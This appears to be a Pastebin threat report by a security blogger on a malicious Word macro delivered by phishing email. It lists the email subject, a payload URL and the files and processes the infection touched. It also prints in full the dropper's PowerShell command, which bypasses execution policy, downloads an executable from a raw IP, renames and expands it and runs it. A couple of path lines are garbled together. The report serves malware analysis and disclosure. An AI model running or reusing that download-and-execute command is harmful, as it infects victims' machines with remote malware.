Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Microsoft Word VBA Macro
- Reported by neonprimetime security
- http://neonprimetime.blogspot.com
- *****
- Blog about this: http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html
- *****
- Malicious Email:
- Subject: 13491-Your Latest Documents from RS Components 595540552
- From: [email protected]
- ****
- G-A9064803940323690616417-1.doc
- hxxp://185.39.149.21/jsaxo8u/g39b2cx.exe
- cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.39.149.21/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
- ****
- Files or Processes touched or involved:
- C:\Documents and Settings\admin\Application Data\Microsoft\Office\Word11.pip
- C:\Documents and Settings\admin\Application Data\Microsoft\Templates\~$Normal.dot
- C:\Documents and Settings\admin\Local Settings\Temp\~$A9064803940323690616417-1-1.doc
- C:\Documents and Settings\admin\Local Settings\Temp\~WRF0000.tmp
- C:\Documents and Settings\admin\Local Settings\Temp\4543543.exe
- C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.Word\~WRS0001.tmp
- C:\Documents and Settings\admin\My Documents
- C:\Program Files\Adobe\Reader 10.0\Reader\AcroRd32.exe
- C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
- C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
- C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
- C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
- C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
- C:\Program Files\Microsoft Office\Office15\WINWORD.EXE
- C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
- C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5B4CA3B6-3252-446E-81B1-05ED1EC4A9D4}.tmp
- C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{77DADE07-13FE-49C3-8F4D-71FDEEE403CA}.tmp
- C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0636F7A0-A653-4482-9EC1-C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0636F7A0-A653-4482-9EC1-C6DB4134DCC9}.tmp
- C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08CE52A0-0BAD-40CC-8402-BF2776E8E6F2}.tmp
- C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AA4D6119-0C70-4589-893F-C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
- C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C3E7D6AC-1C7D-4F5A-AF77-CE2F030680CB}.tmp
- C:\Users\admin\AppData\Local\Temp\~$A9064803940323690616417-1-1.doc
- C:\Users\admin\AppData\Local\Temp\~$A9064803940323690616417-1-2.doc
- C:\Users\admin\AppData\Local\Temp\4543543.exe
- C:\Users\admin\AppData\Local\Temp\CVR6BFB.tmp.cvr
- C:\Users\admin\AppData\Roaming\Microsoft\Office\Word12.pip
- C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
- C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies
- C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
- C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3ec03.TMP
- C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LA6HPGST75M2ECSZRTCW.temp
- C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PTHH5NRSX7703I1BOZAW.temp
- C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DE81A7E2-45B5-49B8-8E58-1C96F8F3ABF3}.tmp
- C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{64FFCFE6-6707-40DF-A0AA-E4A1ADA37256}.tmp
- C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{71A28C78-2F9A-41AD-9DDE-7ED087830983}.tmp
- C:\Users\Administrator\AppData\Local\Temp\~$A9064803940323690616417-1.doc
- C:\Users\Administrator\AppData\Local\Temp\4543543.cab
- C:\Users\Administrator\AppData\Local\Temp\CVRD7D7.tmp.cvr
- C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
- C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
- C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7HPSG0NCKZT9C3A8OLS8.temp
- C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\System\36dbfcf62e07d819b3de533898868ecf\System.ni.dll
- C:\Windows\explorer.exe
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
- C:\Windows\System32\cmd.exe
- C:\Windows\System32\expand.exe
- C:\WINDOWS\system32\expand.exe C:\DOCUME~1\admin\LOCALS~1\Temp\4543543.cab C:\DOCUME~1\admin\LOCALS~1\Temp\4543543.exe
- C:\Windows\system32\expand.exe C:\Users\ADMINI~1\AppData\Local\Temp\4543543.cab C:\Users\ADMINI~1\AppData\Local\Temp\4543543.exe
- C:\Windows\System32\taskhost.exe
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement